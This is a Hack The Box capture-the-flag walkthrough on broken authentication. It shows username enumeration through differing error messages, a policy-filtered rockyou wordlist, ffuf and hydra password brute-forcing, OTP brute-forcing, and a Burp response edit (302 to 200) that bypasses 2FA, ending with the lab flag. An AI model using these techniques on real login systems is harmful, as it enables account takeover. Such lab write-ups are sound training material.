BROKEN AUTHENTICATION

OBJECTIVE: perform a black box security assessment of a client's web application.

Obtain the flag.
#manually walk the webapp & identify potential entry points
root@htb:~$ BROWSER > {targetSite:port}
 * identified registration portal
root@htb:~$ BROWSER > {targetSite:port}/register.php
 username: {arbitraryValue}
 password: {arbitraryValue}
 * submit expected input
 
 * identified password policy
    Password does not meet our password policy:
    Contains at least one digit
    Contains at least one lower-case character
    Contains at least one upper-case character
    Contains NO special characters
    Is exactly 12 characters long

#create a valid account for use in identifying valid usernames
root@htb:~$ BROWSER > {targetSite:port}
 * identified registration portal
root@htb:~$ BROWSER > {targetSite:port}/register.php
 username: null
 password: passw0rD1234
 * submit expected input
 
root@htb:~$ BROWSER > http://94.237.50.242:37952/profile.php
 username: null
 password: passw0rD1234
 * You do not have admin privileges. The site is still under construction and only available to admins at this time.

#identify error msgs for valid username
root@htb:~$ BROWSER > {targetSite:port}
 * identified registration portal
root@htb:~$ BROWSER > {targetSite:port}/register.php
 username: null
 password: {purposelyIncorrectPassword}
 * submit expected input
 
 * valid username but wrong password error msg: Invalid credentials.
 * invalid username (any password) error msg: Unknown username or password.
 * the two responses differ, so the login page discloses whether a username exists — this is the weakness the user-enumeration step below relies on.
 
#generate tailored password
#tailor the password to the organization's password policy (if known)
 Password does not meet our password policy:
 Contains at least one digit
 Contains at least one lower-case character
 Contains at least one upper-case character
 Contains NO special characters
 Is exactly 12 characters long
 
root@htb:~$ locate rockyou.txt
root@htb:~$ cp /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt.tar.gz .
root@htb:~$ tar -xf rockyou.txt.tar.gz
root@htb:~$ wc -l rockyou.txt
 * 14344391 rockyou.txt

root@htb:~$ grep -E '^[[:alnum:]]{12}$' rockyou.txt | grep '[[:upper:]]' | grep '[[:lower:]]' | grep '[[:digit:]]' > customPWList.txt
 * the grep '[[:upper:]]' stage keeps only the piped lines that contain at least one uppercase letter.
    - The [[:upper:]] is a POSIX character class that matches any uppercase letter (A-Z).
 * the grep '[[:lower:]]' filters the lines to include only those containing at least one lowercase letter (matched by [[:lower:]]).
 * the grep '[[:digit:]]' filters the output further to include only lines that contain at least one digit (0-9).
    - the [[:digit:]] POSIX character class matches any numeric digit.
 * the grep -E '^[[:alnum:]]{12}$' uses the -E option (extended regular expressions) to match lines that consist of exactly 12 alphanumeric characters.
    - the ^ and $ anchors bind the pattern to the whole line, so {12} means exactly 12 characters (not "at least 12"); this single pattern enforces both the length rule and the no-special-characters rule of the policy.
 * the [[:alnum:]]: matches any alphanumeric character (letter or digit).
root@htb:~$ wc -l customPWList.txt
 * 17048 customPWList.txt
#identify parameters, pages, & other pertinent info
BURP > Proxy
 Request
 ...
  POST /login.php HTTP/1.1
  Host: 94.237.54.42:52406
  Origin: http://94.237.54.42:52406
  Content-Type: application/x-www-form-urlencoded
  Referer: http://94.237.54.42:52406/login.php
  Cookie: PHPSESSID=4o5c25afhbmnr34dqbbeutsv8i
  Connection: close

  username=test&password=test

#automate user enumeration
root@htb:~$ curl -O https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Usernames/xato-net-10-million-usernames.txt

root@htb:~$ ffuf -w xato-net-10-million-usernames.txt:FUZZ -u http://94.237.61.84:32739/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalidInput" -fr "Unknown username or password." -o userEnum.txt
 NULL   [Status: 200, Size: 4344, Words: 680, Lines: 91, Duration: 139ms]
 gladys [Status: 200, Size: 4344, Words: 680, Lines: 91, Duration: 101ms]
 null   [Status: 200, Size: 4344, Words: 680, Lines: 91, Duration: 139ms]
 Gladys [Status: 200, Size: 4344, Words: 680, Lines: 91, Duration: 101ms]
 
 * the -w represents the wordlist to use
 * the -u represents the target URL and page
 * the -X POST represents the HTTP method to use
 * the -H is used to add a custom header to the HTTP requests
    - the Content-Type application/x-www-form-urlencoded is often used when sending data in a form submission
 * the -d represents the data
 * the -fr is used to filter out results based on a specific response string
    - If the string "Unknown username or password." appears in the HTTP response, that result is excluded from the output, so only usernames that produce a different response are listed.

#brute force the identified user's password using tailored password based on policy
root@htb:~$ ffuf -w ./customPWList.txt:FUZZ -u http://94.237.61.84:32739/login.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=gladys&password=FUZZ" -mc 302
 * dWinaldasD13 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 101ms]
 * ALT: hydra -l gladys -P customPWList.txt 94.237.61.84 -s 32739 -f http-post-form "/:username=gladys&password=^PASS^:Invalid credentials."
BURP > {targetSite:port}
 OTP: 12345
 
 POST /2fa.php HTTP/1.1
 Host: 94.237.61.84:32739
 Origin: http://94.237.61.84:32739
 Referer: http://94.237.61.84:32739/login.php
 Cookie: PHPSESSID=03kue8sbiklfqjpv8r1s9v9bpc
 Content-Type: application/x-www-form-urlencoded

 otp=test
 
 * submit test input to identify invalid msg
    - Invalid OTP.

#generate tokens
#some targets will provide the necessary information regarding the OTP format. e.g., Welcome admin. Please provide your 4-digit One-Time Password (OTP).
root@oco:~$ seq -w 0 9999 > tokens.txt
 * The -w flag pads all numbers to the same length by prepending zeroes
root@oco:~$ cat tokens.txt
 0000
 ...
 9999

root@oco:~$ ffuf -w tokens.txt -u http://94.237.61.84:32739/2fa.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=03kue8sbiklfqjpv8r1s9v9bpc" -d "otp=FUZZ" -fr "Invalid OTP." -t 120
 * no result
#intercept requests and test for direct access authentication bypass
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
BURP > Browser > http://94.237.50.242:37952/login.php
 username: gladys
 password: dWinaldasD13
 * submit expected input

BURP > Proxy > Requests > right-click > Do intercept > Response to this request > Forward
 Request
  ...
  GET /profile.php HTTP/1.1                       //change 2fa.php to /profile.php
  Host: 94.237.62.184:39910
  Cookie: PHPSESSID=0cjtbh0mg9h0vdu4bmal7gib6s
  Connection: close

BURP > Proxy > Response > Forward
 Response
  ...
  HTTP/1.1 302 Found                      // change this to 200 OK
  Date: Wed, 25 Dec 2024 19:13:30 GMT
  Server: Apache/2.4.59 (Debian)
  Location: index.php
  Connection: close
  
  Modifications...
  HTTP/1.1 200 OK
  
root@oco:~$ BROWSER > http://94.237.62.184:39910/profile.php
 * HTB{d86115e037388d0fa29280b737fd9171}
